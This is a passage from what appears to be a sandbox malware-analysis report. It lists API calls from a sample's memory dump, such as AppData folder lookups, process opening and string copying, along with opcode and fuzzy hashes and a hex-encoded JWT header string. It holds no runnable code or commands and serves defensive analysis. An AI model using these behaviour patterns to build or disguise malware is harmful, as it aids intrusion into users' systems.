                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                    • String ID: vector<T> too long$yxxx$yxxx
                                    • API String ID: 2002836212-1517697755
                                    • Opcode ID: 78e8cf855e59c942f85af5f868c0d61a802a51ffabc20a5d1cdcb5bc5475e58b
                                    • Instruction ID: 9572f6c6134772b7e41c11882d69811c584fc619438e94fa305966ed6874bd4d
                                    • Opcode Fuzzy Hash: 78e8cf855e59c942f85af5f868c0d61a802a51ffabc20a5d1cdcb5bc5475e58b
                                    • Instruction Fuzzy Hash: C5F09027F000310F8754643E8D8449EA94656E53E033AD769E81AEF299DC70EC83A5D5
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7E544
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7E573
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7E581
                                    • lstrcat.KERNEL32(?,00A9DCB0), ref: 00F7E59C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: a78cd5344e247a98eeed759ae3a8cb18745efbb1866aa50110bcc6fbcb9d9bc6
                                    • Instruction ID: f0bc14036c3c780060d8e5ea0648777935694e7b47aa09180114ed9ed95c6797
                                    • Opcode Fuzzy Hash: a78cd5344e247a98eeed759ae3a8cb18745efbb1866aa50110bcc6fbcb9d9bc6
                                    • Instruction Fuzzy Hash: 3851CD7591010CAFD764EB54DC42EEE337DFB88300F1844A9BA2AD7245EB749F809BA1
                                    APIs
                                    Strings
                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00F81FDF, 00F81FF5, 00F820B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                     • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: strlen
                                    • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                    • API String ID: 39653677-4138519520
                                    • Opcode ID: 008eef3d8b54ea8942ea60633be8dabfbc0a3fd783678aad55542726096c272b
                                    • Instruction ID: 2adce165cfddb2226740a906c8ff8771ce668e81b882ba25f88394da764d4d37
                                    • Opcode Fuzzy Hash: 008eef3d8b54ea8942ea60633be8dabfbc0a3fd783678aad55542726096c272b
                                    • Instruction Fuzzy Hash: D0210A3691028A9FDB20FA36C4457DDF766EF80365F844056C8194B282E336790AF796
                                    APIs
                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00F7EBB4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7EBE3
                                    • lstrcat.KERNEL32(?,00000000), ref: 00F7EBF1
                                    • lstrcat.KERNEL32(?,00A9E400), ref: 00F7EC0C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FolderPathlstrcpy
                                    • String ID:
                                    • API String ID: 818526691-0
                                    • Opcode ID: 22ec3d64a413336b4423cd6965df5dfe6652ea46e993476b1a72b7c61a8009e7
                                    • Instruction ID: b386d3f310406ae92dc52bca068daa490a0f5cb366daa9a4c96c787cfa895054
                                    • Opcode Fuzzy Hash: 22ec3d64a413336b4423cd6965df5dfe6652ea46e993476b1a72b7c61a8009e7
                                    • Instruction Fuzzy Hash: 1931097191100C9BCB65EFA8DD41BED33B8BF48300F0444B9BA2AD7240DF789E84AB91
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00F84492
                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00F844AD
                                    • CloseHandle.KERNEL32(00000000), ref: 00F844B4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F844E7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                    • String ID:
                                    • API String ID: 4028989146-0
                                    • Opcode ID: 70a92b7fc1c60bf399efeeb07cef1ab388e2edd1cbb043b769fe412519187b08
                                    • Instruction ID: 5433b3f2917a7f0ddc2a90426be009a3df2feaba978dc882daf062014cd40b76
                                    • Opcode Fuzzy Hash: 70a92b7fc1c60bf399efeeb07cef1ab388e2edd1cbb043b769fe412519187b08
                                    • Instruction Fuzzy Hash: 43F0C8B0D016192BE730EB749C49BE6B6A8AB14714F0405A5EE65D6180E6B498C08790
                                    APIs
                                    • __getptd.LIBCMT ref: 00F88FDD
                                      • Part of subcall function 00F887FF: __amsg_exit.LIBCMT ref: 00F8880F
                                    • __getptd.LIBCMT ref: 00F88FF4
                                    • __amsg_exit.LIBCMT ref: 00F89002
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00F89026
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 578de0e56d5b31839ed8e5bdfaf6943fa55ed1ac96c7deaa4dd67dcb70e26812
                                    • Instruction ID: 5ee56edcfe20130a70510fff8b45b2398a255d49e186111d3f39b7709afeb88f
                                    • Opcode Fuzzy Hash: 578de0e56d5b31839ed8e5bdfaf6943fa55ed1ac96c7deaa4dd67dcb70e26812
                                    • Instruction Fuzzy Hash: ADF0903294C7109BDB61BB789C067ED33A06F00761F794109F444AA2D2DFAC9941FB59
                                    APIs
                                    • lstrlen.KERNEL32(------,00F65BEB), ref: 00F8731B
                                    • lstrcpy.KERNEL32(00000000), ref: 00F8733F
                                    • lstrcat.KERNEL32(?,------), ref: 00F87349
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcatlstrcpylstrlen
                                    • String ID: ------
                                    • API String ID: 3050337572-882505780
                                    • Opcode ID: 91505e65e7c78b3e0e66e46cbc649df99590305e23eb4ebdf275ac33058835a2
                                    • Instruction ID: 2d8125fb94c9c885009d867d55c4dbfd2b32fba9fea28819a69580e345b98e00
                                    • Opcode Fuzzy Hash: 91505e65e7c78b3e0e66e46cbc649df99590305e23eb4ebdf275ac33058835a2
                                    • Instruction Fuzzy Hash: 7FF0E5749117029FDB68AF36D848A27B7F9EF95715328882DACEAC7204E734D880DB11
                                    APIs
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                      • Part of subcall function 00F61530: lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73422
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F7344B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73471
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F73497
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: bc393b4e4c015ec0f022a884392c3097814433920f37e8d208cea33b9f2ceb13
                                    • Instruction ID: 1ce57f97054e03ea9923db31a31b004f38e6a3a338f5b657e2ae075768d82d23
                                    • Opcode Fuzzy Hash: bc393b4e4c015ec0f022a884392c3097814433920f37e8d208cea33b9f2ceb13
                                    • Instruction Fuzzy Hash: 30120BB1E01205AFDB28CF19C554A25B7E5BF48328B1DC0AED41D8B3A5D772ED42EB42
                                    APIs
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77C94
                                    • std::_Xinvalid_argument.LIBCPMT ref: 00F77CAF
                                      • Part of subcall function 00F77D40: std::_Xinvalid_argument.LIBCPMT ref: 00F77D58
                                      • Part of subcall function 00F77D40: std::_Xinvalid_argument.LIBCPMT ref: 00F77D76
                                      • Part of subcall function 00F77D40: std::_Xinvalid_argument.LIBCPMT ref: 00F77D91
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Xinvalid_argumentstd::_
                                    • String ID: string too long
                                    • API String ID: 909987262-2556327735
                                    • Opcode ID: 82ca6dc557b5b9413b094e2c7af78882667b689db1335bef0e8afdf1094e0c14
                                    • Instruction ID: 8927cf1e45b87af45fe2e22c6ae12fb6b3ed26713565270371102fefb6a74301
                                    • Opcode Fuzzy Hash: 82ca6dc557b5b9413b094e2c7af78882667b689db1335bef0e8afdf1094e0c14
                                    • Instruction Fuzzy Hash: 1D314B723183104BE731ED6CE88096AF3E9EF99760B20862BF449CB641C7719C4193A6
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 00F66F74
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00F66F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID: @
                                    • API String ID: 1357844191-2766056989
                                    • Opcode ID: ea7f5b8f4d268e38278492be54ca4f4d7e5eca007a6530a04942ff284e62f1a7
                                    • Instruction ID: 9c837e5046657c4789e6dd4cc79824591d7e878e5a4c33c3ce069a198af710f0
                                    • Opcode Fuzzy Hash: ea7f5b8f4d268e38278492be54ca4f4d7e5eca007a6530a04942ff284e62f1a7
                                    • Instruction Fuzzy Hash: DA218EB0A007019BEB208B21D884BB773F8EB44704F44497CF956CB685F7B9E985D791
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F8244C
                                    • lstrlen.KERNEL32(00000000), ref: 00F824E9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F82570
                                    • lstrlen.KERNEL32(00000000), ref: 00F82577
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2001356338-0
                                    • Opcode ID: 8c6ad46544ad868e427afc2baf384f2499f14bde19631a489c990d220471ad82
                                    • Instruction ID: 6b6281677cfc3ce5612e33286a3ed2c534959b9f6dec8faca3a86f398f7e968f
                                    • Opcode Fuzzy Hash: 8c6ad46544ad868e427afc2baf384f2499f14bde19631a489c990d220471ad82
                                    • Instruction Fuzzy Hash: 1C81D2B0E002099BDB54EB94DC54BEEB7B5BF84314F18807DE904AB281EB75AD42DB94
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 00F815A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F815D9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81611
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F81649
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: ffc557e5b43767995da7ce091efe824b6f8a8c49a366b3e750a2d1dd96876766
                                    • Instruction ID: 944e339318d6923e5beba645ee48a5a48f17da8b868026589ad255705df4a1b9
                                    • Opcode Fuzzy Hash: ffc557e5b43767995da7ce091efe824b6f8a8c49a366b3e750a2d1dd96876766
                                    • Instruction Fuzzy Hash: 8721F1B4A01B029FD734EF69D955A17B7F9BF44710B084A2CA496C7A40EB34F841DB50
                                    APIs
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000), ref: 00F6162D
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000,?), ref: 00F6164F
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000,?), ref: 00F61671
                                      • Part of subcall function 00F61610: lstrcpy.KERNEL32(00000000,?), ref: 00F61693
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61557
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61579
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6159B
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F615FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 2c80c8cb211f681cab4728ccbad31b13ff7116e09bd3abd0b9071c22c6b59a46
                                    • Instruction ID: 3474c0d4608bed24dfc3d204b02bb569cb6725bdd75b48033a4f18824bd1aea0
                                    • Opcode Fuzzy Hash: 2c80c8cb211f681cab4728ccbad31b13ff7116e09bd3abd0b9071c22c6b59a46
                                    • Instruction Fuzzy Hash: 3531A5B4A11B029FD768DF3AC589956FBF5BF88315708492DA8A6C3B10DB34F851DB80
                                    APIs
                                    • lstrcpy.KERNEL32(00000000), ref: 00F6162D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6164F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61671
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61693
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy
                                    • String ID:
                                    • API String ID: 3722407311-0
                                    • Opcode ID: 0c4a16dbfabd4025b75bc5fb2d82a979cd671a619393c5771004cbc1d6d27305
                                    • Instruction ID: 7136b8c53c2029f277d84fd036fba464763242105b6b0de1c1894defa58809a3
                                    • Opcode Fuzzy Hash: 0c4a16dbfabd4025b75bc5fb2d82a979cd671a619393c5771004cbc1d6d27305
                                    • Instruction Fuzzy Hash: C61130B8A11B029BDB249F35D45D927B7F8FF48315708093DA4A6C3A40EB35E841DB94